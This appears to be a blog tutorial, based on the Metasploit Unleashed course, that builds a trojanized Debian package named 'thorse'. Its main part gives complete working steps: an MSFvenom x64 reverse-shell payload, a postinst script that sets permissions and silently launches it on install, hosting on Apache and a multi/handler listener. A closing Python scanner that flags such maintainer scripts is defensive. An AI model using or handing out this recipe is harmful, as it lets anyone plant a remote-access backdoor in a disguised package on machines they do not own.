The Metasploit Framework (MSF) includes a utility called MSFvenom. MSFvenom can be used to generate and encode various payloads. It is currently maintained by the folks at Rapid7. My heroes at Offensive Security wrote an awesome tutorial demonstrating how to use MSFvenom as part of their free, ethical-hacking course called Metasploit Unleashed. Yet, I’m not going to lie. I had a little bit of trouble understanding what was happening when I took the tutorial on as a practical exercise. I had even more difficulty when I actually tried getting everything to work. Fortunately, those frustrating moments motivated me to try harder and come up with better notes. Below is my take on the original demo.
The Metasploit Unleashed (MSFU) course is provided free of charge by Offensive Security in order to raise awareness for underprivileged children in East Africa.
Using MSFvenom to Create a Remote Access Trojan (RAT)
Create the necessary directories
You will essentially need two main directories: one for the package files, another for the RAT.
mkdir thorse/
mkdir thorse/DEBIAN/          # will hold the .deb package files
mkdir thorse/usr/
mkdir thorse/usr/share/       # not required, but for fun (see below)
mkdir thorse/usr/local/
mkdir thorse/usr/local/bin/   # will hold your MSFvenom payload
Create the package files
The control file.
vim thorse/DEBIAN/control # required file
Package: thorse
Version: 666
Maintainer: Odysseus
Architecture: all
Description: For wreckin decks!
A goofy banner.
vim thorse/usr/share/banner.txt # not required, but for fun
IT'S A TRAP! >>\. /_ )`. / _)`^)`. _.---. _ (_,' \ `^-)"" `.\ | | \ \ / | / \ /.___.'\ (\ (_ < ,"|| \ |`. \`-' \\ () )| )/ |_>|> /_] // /_] /_]
The post-install file.
vim thorse/DEBIAN/postinst # required
#!/bin/sh
sudo chmod 2755 /usr/local/bin/thorse
if [ $? -eq 0 ]
then
    /usr/local/bin/thorse &
    cat /usr/share/banner.txt    # not required
fi
chmod 755 thorse/DEBIAN/postinst
Generate the payload
The exact command is very long, so I have broken it up here for readability. A shell comment cannot follow a trailing backslash without breaking the line continuation, so the options are explained below the command rather than inline.

msfvenom \
  -a x64 \
  --platform linux \
  -p linux/x64/shell/reverse_tcp \
  LHOST=192.168.5.1 \
  LPORT=8888 \
  -b "\x00" \
  -f elf \
  -e x64/xor \
  -o thorse/usr/local/bin/thorse

-a x64: CPU architecture of the target system
--platform linux: OS of the target system
-p linux/x64/shell/reverse_tcp: payload
LHOST=192.168.5.1: local handler the target connects back to
LPORT=8888: port the target uses upon exploitation
-b "\x00": bad bytes to avoid when generating the payload
-f elf: output format
-e x64/xor: encoder
-o thorse/usr/local/bin/thorse: output file; the path in postinst must match
Build the package (RAT)
Output will be a
dpkg --build thorse/
Get the RAT into position
Copy it to the default web server directory and restart the service as needed.
cp thorse.deb /var/www/html/
service apache2 restart
Start the RAT handler
Consider running your handler inside screen. Otherwise, you will need to keep a dedicated terminal window open while the handler is running.
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.5.1
msf exploit(multi/handler) > set LPORT 8888
msf exploit(multi/handler) > run
[*] Started reverse handler on 192.168.5.1:8888
For the RAT to work, it must be downloaded and then installed on the target.
wget http://192.168.5.1/thorse.deb
dpkg -i thorse.deb
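The whole chain hinges on dpkg running the package's postinst as root, so that script is where a defender looks first; as an added example (not from the original post or from Metasploit Unleashed), this Python scanner reads a .deb as the ar archive it is, pulls the maintainer scripts out of control.tar.*, and flags the three behaviours shown above: a backgrounded command, a setuid/setgid chmod, and execution of a file dropped in /usr/local/bin. The RISKY heuristics, make_deb and the sample package are constructed for the demo; only the parsing of real .deb files is standard (the stdlib tarfile module does not read zstd-compressed control tarballs).

```python
import io, re, tarfile
# Maintainer-script behaviour worth a second look (added example, not from the original post).
RISKY = {
    "backgrounded command": re.compile(r"(?<!&)&\s*(#.*)?$", re.M),
    "setuid/setgid chmod": re.compile(r"\bchmod\s+([2-7][0-7]{3}\b|[ugo]*\+\w*s\b)"),
    "runs a file from /usr/local/bin": re.compile(r"^\s*/usr/local/bin/\S+", re.M),
}

def ar_members(deb: bytes):
    """Yield (name, payload) for each member of the .deb, which is a plain ar archive."""
    assert deb.startswith(b"!<arch>\n"), "not an ar archive"
    pos = 8
    while pos + 60 <= len(deb):
        hdr = deb[pos:pos + 60]                 # fixed 60-byte member header
        name = hdr[:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, deb[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)           # members are padded to even offsets

def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: text} for the maintainer scripts inside control.tar.*"""
    found = {}
    for name, blob in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
                for m in tar.getmembers():
                    base = m.name.lstrip("./")
                    if m.isfile() and base in ("preinst", "postinst", "prerm", "postrm"):
                        found[base] = tar.extractfile(m).read().decode()
    return found

def scan_deb(deb: bytes) -> dict:             # {script: [triggered heuristics]}; [] means nothing flagged
    return {n: [k for k, rx in RISKY.items() if rx.search(t)] for n, t in maintainer_scripts(deb).items()}

def make_deb(control_files: dict) -> bytes:
    """Constructed sample only: pack control files into a minimal .deb using dpkg-deb's layout."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in control_files.items():
            ti = tarfile.TarInfo("./" + name)
            ti.size = len(text.encode())
            tar.addfile(ti, io.BytesIO(text.encode()))
    def member(name, data):                     # one ar entry: 60-byte header + even-padded data
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        return hdr + data + (b"\n" if len(data) % 2 else b"")
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())

# Constructed sample mirroring the postinst shown above; a real .deb is just the bytes read from disk.
POSTINST = "#!/bin/sh\nsudo chmod 2755 /usr/local/bin/thorse\nif [ $? -eq 0 ]\nthen\n  /usr/local/bin/thorse &\n  cat /usr/share/banner.txt\nfi\n"
SAMPLE_DEB = make_deb({"control": "Package: thorse\nVersion: 666\nArchitecture: all\n", "postinst": POSTINST})
```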